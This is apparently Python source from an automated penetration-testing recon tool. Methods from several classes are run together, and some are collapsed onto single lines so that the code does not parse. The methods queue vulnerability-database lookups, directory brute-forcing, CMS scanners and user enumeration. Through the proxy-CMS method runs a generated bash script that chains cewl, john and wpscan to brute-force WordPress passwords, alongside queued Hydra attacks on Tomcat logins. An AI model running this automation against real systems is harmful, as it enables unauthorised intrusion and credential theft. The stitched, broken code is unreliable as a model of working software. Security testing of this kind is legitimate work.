                                                cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Drupal"))
                                                cms_commands.append(c.getCmd("web", "droopescan", httpPort=http_port))
                                            if "Joomla" in cms:
                                                if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                    os.makedirs(c.getPath("vuln", "vulnDir"))
                                                cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Joomla"))
                                                cms_commands.append(c.getCmd("web", "joomscan", httpPort=http_port))
                                                cms_commands.append(c.getCmd("web", "joomlavsTarget", httpPort=http_port))
                                            if "Magento" in cms:
                                                if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                    os.makedirs(c.getPath("vuln", "vulnDir"))
                                                cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Magento"))
                                                cms_commands.append(c.getCmd("web", "magescan", httpPort=http_port))
                                            if "WebDAV" in cms or ("Microsoft-IIS 6.0" in cms):
                                                if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                    os.makedirs(c.getPath("vuln", "vulnDir"))
                                                cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="WebDAV"))
                                                webdav_cmd = c.getCmd("web", "davtest")
                                                webdav_cmd2 = c.getCmd("web", "webDavNmap", httpPort=http_port)
                                                cms_commands.append(webdav_cmd)
                                                cms_commands.append(webdav_cmd2)
                                            if "tomcat" in cms:
                                                if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                    os.makedirs(c.getPath("vuln", "vulnDir"))
                                                cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="tomcat"))
                                                cms_commands.append(c.getCmd("web", "tomcatHydra", httpPort=http_port))
                                            if "Webmin" in cms:
                                                if not os.path.exists(c.getPath("vuln", "vulnDir")):
                                                    os.makedirs(c.getPath("vuln", "vulnDir"))
                                                cms_commands.append(c.getCmd("vuln", "searchsploit", strang=str(cms), name="Webmin"))
                    except FileNotFoundError as fnf_error:
                        # Report file vanished between glob and open: skip it.
                        print(fnf_error)
                        continue
    # Dedupe and sort the gathered commands before exposing them.
    sorted_commands = sorted(set(cms_commands))
    commands_to_run = [i for i in sorted_commands]
    self.cms_processes = tuple(commands_to_run)
def Scan(self):
    """Create Aquatone Report based off of the dirsearch results.
    If the length of urls.txt is greater than 150, aquatone won't be run
    as this might be an indication of too many false positives.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    npp = nmapParser.NmapParserFunk(self.target)
    npp.openProxyPorts()
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    cmd_info = "[" + fg.li_green + "+" + fg.rs + "]"
    # Gather every web-facing port, direct and proxied, into comma-separated
    # strings for the aquatone command templates.
    ssl_ports = np.ssl_ports
    http_ports = np.http_ports
    proxy_http_ports = npp.proxy_http_ports
    proxy_ssl_ports = npp.proxy_ssl_ports
    proxy_ports = np.proxy_ports
    all_web_ports = []
    all_web_proxy_ports = []
    for x in ssl_ports:
        all_web_ports.append(x)
    for x in http_ports:
        all_web_ports.append(x)
    for x in proxy_http_ports:
        all_web_proxy_ports.append(x)
    for x in proxy_ssl_ports:
        all_web_proxy_ports.append(x)
    all_web_ports_comma_list = ",".join(map(str, all_web_ports))
    all_web_proxy_ports_comma_list = ",".join(map(str, all_web_proxy_ports))
    if not os.path.exists(c.getPath("web", "aquatoneDir")):
        os.makedirs(c.getPath("web", "aquatoneDir"))
    aquatone_urls = c.getPath("web", "aquatoneDirUrls")

    def get_num_urls(filepath: str) -> int:
        # Count only lines that look like URLs (start with 'http').
        with open(filepath, 'r') as fp:
            _num_urls = len([
                l.rstrip() for l in fp.readlines() if l.startswith('http')
            ])
        return _num_urls

    if os.path.exists(aquatone_urls):
        # Aquatone only runs when the URL list is non-empty and under the
        # 150-URL false-positive threshold.
        num_urls = get_num_urls(aquatone_urls)
        if num_urls < 150 and (num_urls != 0):
            aquatone_cmd = c.getCmd("web", "aquatone", allWebPorts=all_web_ports_comma_list)
            print(cmd_info, aquatone_cmd)
            call(aquatone_cmd, shell=True)
            # Open the HTML report in firefox when available.
            if not which("firefox"):
                pass
            else:
                if os.path.exists(c.getPath("web", "aquatoneReport")):
                    print(f"""{fg.cyan}Opening Aquatone Report {fg.rs}""")
                    open_in_ff_cmd = f"""firefox {c.getPath("web","aquatoneReport")} &"""
                    call(open_in_ff_cmd, shell=True)
    aquatone_proxy_urls = c.getPath("proxy", "aquatoneDirProxyUrls")
    if os.path.exists(aquatone_proxy_urls):
        num_urls = get_num_urls(aquatone_proxy_urls)
        if num_urls < 150 and (num_urls != 0):
            # NOTE(review): proxy_ports[0] would raise IndexError if no proxy
            # port was parsed — presumably proxy URLs only exist when one was
            # found; confirm against the callers.
            aquatone_cmd = c.getCmd(
                "proxy", "aquatoneProxy", allWebProxyPorts=all_web_proxy_ports_comma_list, proxyPorts=proxy_ports[0])
            print(cmd_info, aquatone_cmd)
            call(aquatone_cmd, shell=True)
            if not which("firefox"):
                pass
            else:
                if os.path.exists(c.getPath("proxy", "aquatoneProxyReport")):
                    open_in_ff_proxy_cmd = f"""firefox {c.getPath("proxy", "aquatoneProxyReport")} &"""
                    call(open_in_ff_proxy_cmd, shell=True)
def Scan(self):
    """Run searchsploit against services discovered by nmap.

    Takes the parsed output from the NmapParserFunk class and queries
    searchsploit for each service banner (FTP, SSH, SMTP and every other
    product string), as well as each HTTP-TITLE from nmap's script scans,
    since a page title often reveals a CMS name or version. The resulting
    shell commands are stored on ``self.processes``; nothing is executed
    here.
    """
    ntop = nmapParser.NmapParserFunk(self.target)
    ntop.openPorts()
    np = nmapParser.NmapParserFunk(self.target)
    np.allOpenPorts()
    ftp_product = list(sorted(set(merge(ntop.ftp_product, np.ftp_product))))
    ssh_product = list(sorted(set(merge(ntop.ssh_product, np.ssh_product))))
    smtp_product = list(sorted(set(merge(ntop.smtp_product, np.smtp_product))))
    products = list(sorted(set(merge(ntop.all_products, np.all_products))))
    http_title = ntop.http_script_title
    # Products whose first word matches these generate useless noise.
    ignore = ["apache", "mysql", "microsoft"]
    # Title substrings that carry no CMS information.
    boring_titles = ("redirect", "site doesn't have a title", "apache2", "nginx")
    commands_to_run = []
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)

    def _ensure_vuln_dir():
        """Create the vuln report directory if it doesn't exist yet."""
        if not os.path.exists(c.getPath("vuln", "vulnDir")):
            os.makedirs(c.getPath("vuln", "vulnDir"))

    def _banner_cmd(product_list, name):
        """Queue a searchsploit command for a single-product service banner."""
        if len(product_list) == 1:
            _ensure_vuln_dir()
            lowercase = " ".join(map(str, product_list)).lower()
            commands_to_run.append(
                c.getCmd("vuln", "searchsploit", strang=lowercase, name=name))

    def _title_cmds(title):
        """Queue searchsploit commands derived from one http-title value."""
        lowercase_title = " ".join(map(str, title)).lower()
        if any(b in lowercase_title for b in boring_titles):
            return
        first_word = lowercase_title.split(" ", 1)[0]
        first_two_words = " ".join(
            lowercase_title.replace("[", "").replace("]", "")
            .replace("\n", " ").replace("'", "").split(" ", 2)[0:2])
        commands_to_run.append(
            c.getCmd("vuln", "searchsploit",
                     strang=str(first_two_words), name="http-title"))
        commands_to_run.append(
            c.getCmd("vuln", "searchsploit",
                     strang=first_word, name=f"{first_word}"))

    ### FTP / SSH / SMTP searchsploit products ###
    _banner_cmd(ftp_product, "ftp")
    _banner_cmd(ssh_product, "ssh")
    _banner_cmd(smtp_product, "smtp")
    #### HTTP Title searchsploit (hoping for CMS in title) ##########
    if len(http_title) >= 1:
        _ensure_vuln_dir()
        if len(http_title) > 1:
            for title in http_title:
                _title_cmds(title)
        else:
            # Single title: process the whole list as one joined string,
            # matching the multi-title per-item treatment above.
            _title_cmds(http_title)
    #### Every other discovered product string ####
    if len(products) != 0:
        _ensure_vuln_dir()
        for p in products:
            lowercase_product = str(p).lower()
            fw = lowercase_product.split(" ", 1)[0]
            # Skip empty banners and products whose first word is noise.
            if not lowercase_product or not fw or fw in ignore:
                continue
            commands_to_run.append(
                c.getCmd("vuln", "searchsploit",
                         strang=lowercase_product, name="all-services"))
            commands_to_run.append(
                c.getCmd("vuln", "searchsploit",
                         strang=str(fw), name="all-services"))
    # Dedupe and order deterministically before queueing.
    self.processes = tuple(sorted(set(commands_to_run)))
    if self.processes:
        print(f"[{fg.li_yellow}+{fg.rs}] {fg.li_cyan}SEARCHING FOR EXPLOITS {fg.rs}")
def getUdpPorts(self): """Helper Function to parse UDP ports.""" udp = nmapParser.NmapParserFunk(self.target) udp.openUdpPorts()
def Scan(self):
    """Enumerate Web Server ports based on nmaps output.

    This function will run the following tools; WhatWeb, WafW00f,
    Dirsearch, Nikto, and curl robots.txt. Commands are collected and
    stored on ``self.processes``; nothing is executed here.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    http_ports = np.http_ports
    system_type = np.os_system_type
    if len(http_ports) == 0:
        # No web ports: nothing to enumerate.
        pass
    else:
        hl = helper_lists.IgnoreHttpPorts()
        # Drop ports configured to be ignored for HTTP enumeration.
        _http_ports = [x for x in http_ports if x not in hl.ignore_http_ports]
        print(f"""{fg.li_cyan}Enumerating HTTP Ports! {fg.rs}""")
        c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
        dn = domainFinder.DomainFinder(self.target)
        dn.getRedirect()
        # Hostnames learned from HTTP redirects, lowercased and deduped.
        hostnames = sorted(set(a.lower() for a in dn.redirect_hostname))
        if not os.path.exists(c.getPath("web", "webDir")):
            os.makedirs(c.getPath("web", "webDir"))
        if not os.path.exists(c.getPath("web", "aquatoneDir")):
            os.makedirs(c.getPath("web", "aquatoneDir"))
        commands = []
        another_array_of_hostnames = []
        if hostnames:
            for d in hostnames:
                another_array_of_hostnames.append(d)
        if another_array_of_hostnames:
            # Crawl page source of known vhosts for additional domain names.
            vhc = vhostCrawl.checkSource(self.target, hostnames=another_array_of_hostnames)
            vhc.getLinks()
            htb_source_domains = vhc.htb_source_domains
            if htb_source_domains:
                for d in htb_source_domains:
                    another_array_of_hostnames.append(d)
            sorted_hostnames = sorted(set(a.lower() for a in another_array_of_hostnames))
            self.check_links(sorted_hostnames, http_ports)
            # Build hostname-aware commands for every (hostname, port) pair.
            for hostname in sorted_hostnames:
                for port in _http_ports:
                    commands.append(c.getCmd("web", "niktoHost", host=hostname, port=port))
                    commands.append(c.getCmd("web", "whatwebHttpHost", host=hostname, port=port))
                    commands.append(c.getCmd("web", "wafw00fHost", host=hostname, port=port))
                    commands.append(c.getCmd("web", "curlRobotsHost", host=hostname, port=port))
                    if system_type:
                        # OS-specific dirsearch wordlist selection.
                        if system_type[0] == "Windows":
                            commands.append(c.getCmd("web", "dirsearchHttpHostDictWindows", host=hostname, port=port))
                            robots_check = check_robots.ParseRobots(self.target, port, althost=hostname)
                            disallowed_dirs = robots_check.interesting_dirs()
                            if disallowed_dirs:
                                # Also brute-force each Disallowed: entry from robots.txt.
                                for _dir in disallowed_dirs:
                                    commands.append(c.getCmd("web", "dirsearchHostDisallowedWindows", host=hostname, port=port, dirname=_dir))
                        if system_type[0] == "Linux":
                            commands.append(c.getCmd("web", "dirsearchHttpHostDict", host=hostname, port=port))
                            robots_check = check_robots.ParseRobots(self.target, port, althost=hostname)
                            disallowed_dirs = robots_check.interesting_dirs()
                            if disallowed_dirs:
                                for _dir in disallowed_dirs:
                                    commands.append(c.getCmd("web", "dirsearchHostDisallowed", host=hostname, port=port, dirname=_dir))
                    else:
                        # Unknown OS: default to the Linux-style wordlist.
                        commands.append(c.getCmd("web", "dirsearchHttpHostDict", host=hostname, port=port))
                        robots_check = check_robots.ParseRobots(self.target, port, althost=hostname)
                        disallowed_dirs = robots_check.interesting_dirs()
                        if disallowed_dirs:
                            for _dir in disallowed_dirs:
                                commands.append(c.getCmd("web", "dirsearchHostDisallowed", host=hostname, port=port, dirname=_dir))
        else:
            # No hostnames discovered: enumerate by bare target IP instead.
            for port in _http_ports:
                commands.append(c.getCmd("web", "niktoTarget", port=port))
                commands.append(c.getCmd("web", "whatwebHttpTarget", port=port))
                commands.append(c.getCmd("web", "wafw00fTarget", port=port))
                commands.append(c.getCmd("web", "curlRobotsTarget", port=port))
                if system_type:
                    if system_type[0] == "Windows":
                        commands.append(c.getCmd("web", "dirsearchHttpTargetDictWindows", port=port))
                        robots_check = check_robots.ParseRobots(self.target, port)
                        disallowed_dirs = robots_check.interesting_dirs()
                        if disallowed_dirs:
                            for _dir in disallowed_dirs:
                                commands.append(c.getCmd("web", "dirsearchDisallowedWindows", port=port, dirname=_dir))
                    if system_type[0] == "Linux":
                        commands.append(c.getCmd("web", "dirsearchHttpTargetDict", port=port))
                        robots_check = check_robots.ParseRobots(self.target, port)
                        disallowed_dirs = robots_check.interesting_dirs()
                        if disallowed_dirs:
                            for _dir in disallowed_dirs:
                                commands.append(c.getCmd("web", "dirsearchDisallowed", port=port, dirname=_dir))
                else:
                    commands.append(c.getCmd("web", "dirsearchHttpTargetDict", port=port))
                    robots_check = check_robots.ParseRobots(self.target, port)
                    disallowed_dirs = robots_check.interesting_dirs()
                    if disallowed_dirs:
                        for _dir in disallowed_dirs:
                            commands.append(c.getCmd("web", "dirsearchDisallowed", port=port, dirname=_dir))
        # sorted_cmds = sorted(set(commands), reverse=True)
        # commands_to_run = [i for i in sorted_cmds]
        self.processes = tuple(commands)
def proxyCMS(self):
    """If a Content Management System is discovered on the web from
    enumProxy's output, then proceed to try and enumerate the CMS further.

    CMS Scanners to be scanned are limited to: Drupal, Wordpress, Joomla,
    Magento, Tomcat, and Apache WebDav. Commands are collected on
    ``self.cms_processes``; whatweb is run inline to detect the CMS first.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    npp = nmapParser.NmapParserFunk(self.target)
    npp.openProxyPorts()
    proxy_http_ports = npp.proxy_http_ports
    proxy_ports = np.proxy_ports
    teal = fg.li_cyan
    hasPrinted = False           # only announce "Found WordPress!" once
    cms_commands = []
    cms_counter = 0
    reset = fg.rs
    if len(proxy_http_ports) == 0:
        pass
    if len(proxy_ports) == 0:
        pass
    else:
        c = config_parser.CommandParser(f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
        for proxy in proxy_ports:
            for proxy_http_port in proxy_http_ports:
                whatweb_files = []
                wordpress_url = []
                wp = helper_lists.Wordpress(self.target)
                wordpressDirs = wp.wordpress_dirs
                # Collect any proxied URLs that look like WordPress paths.
                if os.path.exists(c.getPath("proxy", "aquatoneDirProxyUrls")):
                    try:
                        with open(c.getPath("proxy", "aquatoneDirProxyUrls"), "r") as purls:
                            for url in purls:
                                uline = url.rstrip()
                                for word in wordpressDirs:
                                    if word in uline:
                                        wordpress_url.append(uline)
                    except FileNotFoundError as fnf_error:
                        print(fnf_error)
                        exit()
                sorted_wp_links = sorted(set(wordpress_url))
                count = 0
                if len(sorted_wp_links) != 0:
                    # Fingerprint at most 2 WordPress-looking URLs with whatweb.
                    for wpdir in sorted_wp_links:
                        count += 1
                        try:
                            # whatweb_proxy_cmd = f"""whatweb -v -a 3 --proxy {self.target}:{proxy_ports[0]} {wpdir} > {c.getPath("reportDir")}/proxy/web/whatweb-proxy-{proxy_http_port}-{count}.txt"""
                            whatweb_proxy_cmd = c.getCmd("proxy", "whatwebProxyWP", proxyPorts=proxy, wordpressDirs=wpdir, httpProxy=proxy_http_port, count=count)
                            call(whatweb_proxy_cmd, shell=True)
                            if count >= 2:
                                break
                        except CalledProcessError:
                            pass  # this will handle errors in the called executable.
                        except OSError:
                            pass
                # Gather every whatweb report file for this proxied port.
                dir_list = [
                    d for d in glob.iglob(c.getPath("proxy", "proxyGlob"), recursive=True)
                    if os.path.isdir(d)
                ]
                for d in dir_list:
                    reportFile_list = [
                        fname for fname in glob.iglob(f"{d}/*", recursive=True)
                        if os.path.isfile(fname)
                    ]
                    for rf in reportFile_list:
                        if "nmap" not in rf:
                            if "whatweb" in rf:
                                if str(proxy_http_port) in rf:
                                    whatweb_files.append(rf)
                if len(whatweb_files) != 0:
                    for i in whatweb_files:
                        cms_strings = [
                            "WordPress",
                            "Magento",
                            "tomcat",
                            "WebDAV",
                            "Drupal",
                            "Joomla",
                        ]
                        with open(i, "r") as wwf:
                            for word in wwf:
                                fword = (
                                    word.replace("[", " ")
                                    .replace("]", " ")
                                    .replace(",", " ")
                                )
                                for cms in cms_strings:
                                    if cms in fword:
                                        if "WordPress" in cms and not hasPrinted:
                                            print(f"{teal}Found WordPress!{reset}")
                                            cms_counter += 1
                                            if len(sorted_wp_links) != 0:
                                                for wpLink in sorted_wp_links:
                                                    wpscan_cmd = c.getCmd("proxy", "wpscanProxy", sortedWpDirs=wpLink, httpProxy=proxy, httpProxyPort=proxy_http_port)
                                                    cms_commands.append(wpscan_cmd)
                                            if cms_counter >= 1:
                                                hasPrinted = True
                                                break
                                            # NOTE(review): the break above fires whenever
                                            # cms_counter >= 1, which is always true right
                                            # after the increment — so the brute-force
                                            # script below appears unreachable. Confirm
                                            # intended nesting against upstream.
                                            manual_brute_force_script = f"""
#!/bin/bash
if [[ -n $(grep -i "User(s) Identified" {c.getPath("proxy", "wpscanReport", proxyPort=proxy_http_port)}) ]]; then
grep -w -A 100 "User(s)" {c.getPath("proxy", "wpscanReport", proxyPort=proxy_http_port)} | grep -w "[+]" | cut -d " " -f 2 | head -n -7 >{c.getPath("proxy", "wpUsers")}
{c.getCmd("proxy", "proxychainsCewl", proxyPorts=proxy_http_port)}
sleep 10
echo "Adding John Rules to Cewl Wordlist!"
{c.getCmd("proxy", "john")}
sleep 3
# brute force again with wpscan
{c.getCmd("proxy", "wpscanCewlBrute", proxyPorts=proxy_http_port, httpProxy=proxy)}
sleep 1
if grep -i "No Valid Passwords Found" wordpress-cewl-brute2.txt; then
if [ -s {c.getPath("proxy", "johnCewl")} ]; then
{c.getCmd("proxy", "wpscanJohnCewlBrute", proxyPorts=proxy_http_port, httpProxy=proxy)}
else
echo "John wordlist is empty :("
fi
sleep 1
if grep -i "No Valid Passwords Found" {c.getPath("proxy","wpscanJohnCoolBrute")}; then
{c.getCmd("proxy", "wpscanFastTrackBrute", proxyPorts=proxy_http_port, httpProxy=proxy)}
fi
fi
fi
"""
                                            try:
                                                with open(c.getPath("proxy", "wordpressBashBruteScript"), "w") as wpb:
                                                    print("Creating wordpress Brute Force Script...")
                                                    wpb.write(manual_brute_force_script)
                                                call(f"""chmod +x {c.getPath("proxy", "wordpressBashBruteScript")}""", shell=True)
                                            except FileNotFoundError as fnf_error:
                                                print(fnf_error)
                                        if "Drupal" in cms:
                                            drupal_cmd = c.getCmd("proxy", "droopescan", proxyPorts=proxy_http_port)
                                            cms_commands.append(drupal_cmd)
                                        if "Joomla" in cms:
                                            joomla_cmd = c.getCmd("proxy", "joomscan", proxyPorts=proxy_http_port, httpProxy=proxy)
                                            cms_commands.append(joomla_cmd)
                                        if "Magento" in cms:
                                            magento_cmd = c.getCmd("proxy", "magescan", proxyPorts=proxy_http_port)
                                            cms_commands.append(magento_cmd)
                                        if "WebDAV" in cms or ("Microsoft-IIS 6.0" in cms):
                                            webdav_cmd2 = c.getCmd("proxy", "webdavNmap", proxyPort=proxy_http_port)
                                            cms_commands.append(webdav_cmd2)
    # Dedupe, sort, and queue the CMS-specific scans.
    sorted_commands = sorted(set(cms_commands))
    commands_to_run = []
    for i in sorted_commands:
        commands_to_run.append(i)
    mpCmds = tuple(commands_to_run)
    self.cms_processes = mpCmds
def Scan(self):
    """This Scan Function will proceed to enumerate all the remaining
    services found by nmaps fullTcpScan results.

    The following services will be enumerated if their respective ports
    are open: FTP, SMTP, NFS, RPC, TELNET, SIP, VNC, CUPS, MSSQL, MYSQL,
    CASSANDRA, MONGODB, POP3, SNMP, AND KERBEROS. Commands are queued on
    ``self.processes``; nothing is executed here.
    """
    ntop = nmapParser.NmapParserFunk(self.target)
    ntop.openPorts()
    np = nmapParser.NmapParserFunk(self.target)
    np.allOpenPorts()
    # Merge per-service port lists from the top-ports and full TCP scans.
    ftpPorts = list(sorted(set(merge(np.ftp_ports, ntop.ftp_ports))))
    smtpPorts = list(sorted(set(merge(ntop.smtp_ports, np.smtp_ports))))
    nfsPorts = list(sorted(set(merge(ntop.nfs_ports, np.nfs_ports))))
    # rpcPorts = list(sorted(set(merge(ntop.rpc_ports, np.rpc_ports))))
    telnetPorts = list(
        sorted(set(merge(ntop.telnet_ports, np.telnet_ports))))
    sipPorts = list(sorted(set(merge(ntop.sip_ports, np.sip_ports))))
    vncPorts = list(sorted(set(merge(ntop.vnc_ports, np.vnc_ports))))
    cupsPorts = list(sorted(set(merge(ntop.cups_ports, np.cups_ports))))
    javaRmiPorts = list(
        sorted(set(merge(ntop.java_rmi_ports, np.java_rmi_ports))))
    mssqlPorts = list(sorted(set(merge(ntop.mssql_ports, np.mssql_ports))))
    mysqlPorts = list(sorted(set(merge(ntop.mysql_ports, np.mysql_ports))))
    cassandraPorts = list(
        sorted(set(merge(ntop.cassandra_ports, np.cassandra_ports))))
    mongoPorts = list(sorted(set(merge(ntop.mongo_ports, np.mongo_ports))))
    pop3Ports = list(sorted(set(merge(ntop.pop3_ports, np.pop3_ports))))
    kerberosPorts = list(
        sorted(set(merge(ntop.kerberos_ports, np.kerberos_ports))))
    fingerPorts = list(
        sorted(set(merge(ntop.finger_ports, np.finger_ports))))
    tcpPorts = list(sorted(set(merge(ntop.tcp_ports, np.tcp_ports))))
    string_tcp_ports = ",".join(map(str, tcpPorts))
    # UDP results come from a separate parser instance.
    unp = nmapParser.NmapParserFunk(self.target)
    unp.openUdpPorts()
    snmpPorts = unp.snmp_ports
    ikePorts = unp.ike_ports
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    unsorted_commands = []
    # Always run the vulners NSE scan across every open TCP port.
    unsorted_commands.append(
        c.getCmd("nmap", "nmapVulners", openTcpPorts=string_tcp_ports))
    if snmpPorts:
        if not os.path.exists(c.getPath("snmp", "snmpDir")):
            os.makedirs(c.getPath("snmp", "snmpDir"))
        unsorted_commands.append(c.getCmd("snmp", "snmpwalk"))
        unsorted_commands.append(c.getCmd("snmp", "snmpCheck"))
        unsorted_commands.append(c.getCmd("snmp", "onesixtyone"))
    if ikePorts:
        unsorted_commands.append(c.getCmd("ike", "ikescan"))
        unsorted_commands.append(c.getCmd("ike", "ikescan4500"))
        unsorted_commands.append(c.getCmd("ike", "nmapIke"))
    if ftpPorts:
        string_ftp_ports = ",".join(map(str, ftpPorts))
        unsorted_commands.append(
            c.getCmd("ftp", "nmapFtp", ftpPorts=string_ftp_ports))
    if fingerPorts:
        if not os.path.exists(c.getPath("finger", "fingerDir")):
            os.makedirs(c.getPath("finger", "fingerDir"))
        for p in fingerPorts:
            unsorted_commands.append(
                c.getCmd("finger", "fingerUserEnum", p=p))
    if smtpPorts:
        if not os.path.exists(c.getPath("smtp", "smtpDir")):
            os.makedirs(c.getPath("smtp", "smtpDir"))
        for p in smtpPorts:
            unsorted_commands.append(c.getCmd("smtp", "smtpUserEnum", p=p))
    if nfsPorts:
        if not os.path.exists(c.getPath("nfs", "nfsDir")):
            os.makedirs(c.getPath("nfs", "nfsDir"))
        string_nfs_ports = ",".join(map(str, nfsPorts))
        unsorted_commands.append(
            c.getCmd("nfs", "nmapNfs", nfsPorts=string_nfs_ports))
        unsorted_commands.append(c.getCmd("nfs", "showmount"))
    # if rpcPorts:
    #     if not os.path.exists(c.getPath("rpc", "rpcDir")):
    #         os.makedirs(c.getPath("rpc", "rpcDir"))
    #     if not os.path.exists(c.getPath("smb", "smbScan")):
    #         unsorted_commands.append(c.getCmd("rpc", "enum4linuxRpc"))
    #     if which("impacket-rpcdump"):
    #         unsorted_commands.append(c.getCmd("rpc", "rpcdump"))
    if cupsPorts:
        string_cups_ports = ",".join(map(str, cupsPorts))
        unsorted_commands.append(
            c.getCmd("cups", "nmapCups", cupsPorts=string_cups_ports))
    if javaRmiPorts:
        string_java_rmi_ports = ",".join(map(str, javaRmiPorts))
        unsorted_commands.append(
            c.getCmd("java", "javaRmiDump", javarmiPorts=string_java_rmi_ports))
        unsorted_commands.append(
            c.getCmd("java", "javaRmiVulns", javarmiPorts=string_java_rmi_ports))
    if sipPorts:
        if not os.path.exists(c.getPath("sip", "sipDir")):
            os.makedirs(c.getPath("sip", "sipDir"))
        string_sip_ports = ",".join(map(str, sipPorts))
        unsorted_commands.append(
            c.getCmd("sip", "nmapSip", sipPorts=string_sip_ports))
        unsorted_commands.append(c.getCmd("sip", "svwar"))
    if vncPorts:
        string_vnc_ports = ",".join(map(str, vncPorts))
        unsorted_commands.append(
            c.getCmd("vnc", "nmapVnc", vncPorts=string_vnc_ports))
    if telnetPorts:
        string_telnet_ports = ",".join(map(str, telnetPorts))
        unsorted_commands.append(
            c.getCmd("telnet", "nmapTelnet", telnetPorts=string_telnet_ports))
    if cassandraPorts:
        string_cassandra_ports = ",".join(map(str, cassandraPorts))
        unsorted_commands.append(
            c.getCmd("cassandra", "nmapCassandra", cassandraPorts=string_cassandra_ports))
    if mssqlPorts:
        string_mssql_ports = ",".join(map(str, mssqlPorts))
        # nmapMssql needs both the full list and a single primary port.
        unsorted_commands.append(
            c.getCmd("mssql", "nmapMssql", mssqlPorts=string_mssql_ports, mssqlPort=mssqlPorts[0]))
    if mysqlPorts:
        string_mysql_ports = ",".join(map(str, mysqlPorts))
        unsorted_commands.append(
            c.getCmd("mysql", "nmapMysql", mysqlPorts=string_mysql_ports))
    if mongoPorts:
        string_mongo_ports = ",".join(map(str, mongoPorts))
        unsorted_commands.append(
            c.getCmd("mongodb", "nmapMongo", mongoPorts=string_mongo_ports))
    if pop3Ports:
        string_pop3_ports = ",".join(map(str, pop3Ports))
        unsorted_commands.append(
            c.getCmd("pop3", "nmapPop3", popPorts=string_pop3_ports))
    if kerberosPorts:
        string_kerberos_ports = ",".join(map(str, kerberosPorts))
        unsorted_commands.append(
            c.getCmd("kerberos", "nmapKerberos", kerberosPorts=string_kerberos_ports))
        # Kerberos implies a domain controller: also kick off WinRM enumeration.
        kirby = kerbEnum.KerbEnum(self.target)
        kirby.PwnWinRM()
    set_sorted_cmds = sorted(set(unsorted_commands))
    cmds_to_run = []
    for i in set_sorted_cmds:
        cmds_to_run.append(i)
    self.processes = tuple(cmds_to_run)
def CewlWordlist(self): np = nmapParser.NmapParserFunk(self.target) np.openPorts() http_ports = np.http_ports htports = [] if len(http_ports) == 1: htports.append(http_ports[0]) ssl_ports = np.ssl_ports slports = [] if len(ssl_ports) == 1: slports.append(ssl_ports[0]) c = config_parser.CommandParser( f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target) if os.path.exists(c.getPath("web", "aquatoneDirUrls")): if not os.path.exists(c.getPath("wordlists", "wordlistsDir")): os.makedirs(c.getPath("wordlists", "wordlistsDir")) url_list = [] urls_file = c.getPath("web", "aquatoneDirUrls") if os.path.exists(urls_file): try: with open(urls_file, "r") as uf: for line in uf: if "index.html" in line: url_list.append(line.rstrip()) if "index.php" in line: url_list.append(line.rstrip()) if len(htports) == 1: url_list.append(f"http://{self.target}:{htports[0]}/") if len(slports) == 1: url_list.append(f"https://{self.target}:{slports[0]}/") wordlist = sorted(set(url_list)) except FileNotFoundError as fnf_error: print(fnf_error) exit() cewl_cmds = [] if len(wordlist) != 0: counter = 0 for url in wordlist: counter += 1 cewl_cmds.append( f"""cewl {url} -m 3 -w {c.getPath("wordlists","CewlCounter", counter=counter)}""" ) if len(cewl_cmds) != 0: try: for cmd in cewl_cmds: call(cmd, shell=True) except ConnectionRefusedError as cre_error: print(cre_error) words = [] try: with open(c.getPath("wordlists", "CustomPass1575"), "r") as prob: for line in prob: words.append(line.rstrip()) for wl in os.listdir(c.getPath("wordlists", "wordlistsDir")): wlfile = f"""{c.getPath("wordlists","wordlistsDir")}/{wl}""" with open(wlfile, "r") as wlf: for line in wlf: words.append(line.rstrip()) set_unique_words = sorted(set(words)) unique_words = list(set_unique_words) with open(c.getPath("wordlists", "CewlPlus"), "a") as allwls: string_words = "\n".join(map(str, unique_words)) allwls.write(str(string_words)) except FileNotFoundError as fnf_error: print(fnf_error)
def GetHostNames(self):
    """This Function is for HTTPS/SSL enumWebSSL Class to enumerate found
    hostnames.

    Domain names are harvested from three places: the nmap top-ports scan
    output (certificate commonName/organizationName fields), sslscan
    report files, and — when a DNS port is open — reverse lookups and
    zone-transfer attempts via dig. Results accumulate on
    ``self.hostnames``; ``self.heartbleed`` is set if sslscan flagged it.
    """
    np = nmapParser.NmapParserFunk(self.target)
    np.openPorts()
    ssl_ports = np.ssl_ports
    dnsPort = np.dns_ports
    c = config_parser.CommandParser(
        f"{os.path.expanduser('~')}/.config/autorecon/config.yaml", self.target)
    ig = helper_lists.ignoreDomains()
    ignore = ig.ignore
    allsortedhostnameslist = []
    dns = []
    try:
        # Pull candidate domain names out of the raw nmap scan text.
        with open(c.getPath("nmap", "nmap_top_ports_nmap"), "r") as nm:
            for line in nm:
                # Normalize certificate-field separators before matching.
                new = (line.replace("=", " ").replace("/", " ").replace(
                    "commonName=", "").replace("/organizationName=", " ").replace(",", " ").replace("_", " "))
                matches = re.findall(
                    r"(?:[a-zA-Z0-9](?:[a-zA-Z0-9\-]{,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{3,6}", new)
                for x in matches:
                    if not any(s in x for s in ignore):
                        dns.append(x)
            sdns = sorted(set(dns))
            tmpdns = []
            for x in sdns:
                tmpdns.append(x.lower())
    except FileNotFoundError as fnf_error:
        print(fnf_error)
        exit()
    ################# SSLSCAN #######################
    if len(ssl_ports) == 0:
        # No SSL ports: the nmap-derived names are all we have.
        tmpdns2 = []
        for x in tmpdns:
